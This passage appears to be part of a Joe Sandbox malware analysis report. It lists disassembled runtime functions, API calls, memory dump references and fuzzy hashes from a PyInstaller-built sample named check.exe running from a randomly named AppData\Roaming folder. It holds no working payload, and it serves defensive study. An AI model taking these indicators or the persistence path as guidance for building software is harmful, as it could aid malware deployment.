                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3F6
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B407
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B418
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                          • Instruction ID: dc7a55f717b2a8568f3d506291374d109cfee97a9748e077d973c59abc632cd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67117220F08E0281F958BF265DD1579E1425F547B0FD843B4D97E466C6FDACB509C324
                                                                                                                                                                                                                                          Function 00007FF71250B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                          • Instruction ID: b9de143e5684571c2c84c89c29413c3598c912d1bb8ed7cbadc207ac3a93adb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E111C20E09E0782F95C7E624CD257DA1424F59730F9447B4D93E4A6C2FDACB448D239
                                                                                                                                                                                                                                          Function 00007FF712505FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: verbose
                                                                                                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                          • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                          • Instruction ID: 2b7aa48c2226d22ae2a15848d533618e87caa8aca10ed0c310bfe062f6713f95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA91D422A08E4689F720AE24DC9077DB691AF44B74FE44171DA5D473D6EEBCE849C338
                                                                                                                                                                                                                                          Function 00007FF71250FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                          • Instruction ID: a1f6f64578c3d196d9c62492bc27b93304a4d321c4e7acbd6990fec3e152a8b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7581C473D0CA0387F7657F2599D0278B6A0AB11B64FD540B5CA0D97285EFACE80AD339
                                                                                                                                                                                                                                          Function 00007FF7124FD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                          • Instruction ID: 5fbf22e64d2f52d668e4078b44b2aab5cb59eb86f08a461c1514c464d7e3a360
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E51B332B19E42CADB14AF19D444678B391EB84BA4F908134DEAD47788DFBCEC65C710
                                                                                                                                                                                                                                          Function 00007FF7124FF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                          • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                          • Instruction ID: 8c3a1bff8893fe50a7cde026f814ca5511b222646a635609cfa158d452c04aee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12519332A08B4287EB74AF299444268B7A0FB94BA4F954135DE4C47BC5CFBCE868C751
                                                                                                                                                                                                                                          Function 00007FF7124FEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                          • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                          • Instruction ID: af8dbfb186c8b0c3e7cecdc748f124c2d8d6687b8d97b7b7eb0d0da2ce254d21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1618332908BC586D7319B19E4403AAB7A0FBC4B98F444225EF9D03B95DFBCD5A4CB50
                                                                                                                                                                                                                                          Function 00007FF7124F2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                          • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                          • Instruction ID: 79a3cef72ea4c2b877b9a125973f30fecf119eb341e912f66bdc748d30846feb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA21D172B08F4192E710EB18F8857EAA3A0FB88794F800136EE8D53656EF7CD659C750
                                                                                                                                                                                                                                          Function 00007FF71250C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                                          • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                          • Instruction ID: 5c91fe9effcd0b40d6ed3c35ac6331077029ad7464fac9be7c17dca8adbc1a5f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80D13872F08F408AE710DF65D8802AC77B1FB557A8B844275DE4D97B89EE78E00AC318
                                                                                                                                                                                                                                          Function 00007FF7124F20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                                          • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction ID: 0260be9b265cd4375da2a1e0a6b2cac5455bdfd86762954b158bf7019abc4e5f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72112921B0C94242F755EB6DE6852BA9252EBD87A0FC48030DF4907B89DDADDCA8C614
                                                                                                                                                                                                                                          Function 00007FF712515B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                          • Instruction ID: 246698f8ec1c2415241ea0e369f02d1ec9127c2bf402482d6056af7218835a6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3441F922B08A8245F764AF25E4C1379E750EB80BB8F984275EE5D06BD5DFBCD449C710
                                                                                                                                                                                                                                          Function 00007FF712509014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF712509046
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: RtlFreeHeap.NTDLL(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7124FCBA5), ref: 00007FF712509064
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                          • API String ID: 3580290477-2842465422
                                                                                                                                                                                                                                          • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                          • Instruction ID: 86ab4616d2402055fe56db14064aacc2a5e20562e766985cfa6b0d67213e8177
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C417136A08E0285EB14FF2598C04BDA7A4EF44BE0B955075EE4D47B85EE7CE889C364
                                                                                                                                                                                                                                          Function 00007FF71250CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                          • Instruction ID: 05469cda44b1c541649f0317bbe74c7e81bd2631ea04ad56f9ee33eb8d9fc1ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0441B332718F8181DB20DF25E8843AAA760FB897A4F804131EE4D87794EF7CD405C754
                                                                                                                                                                                                                                          Function 00007FF71250F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
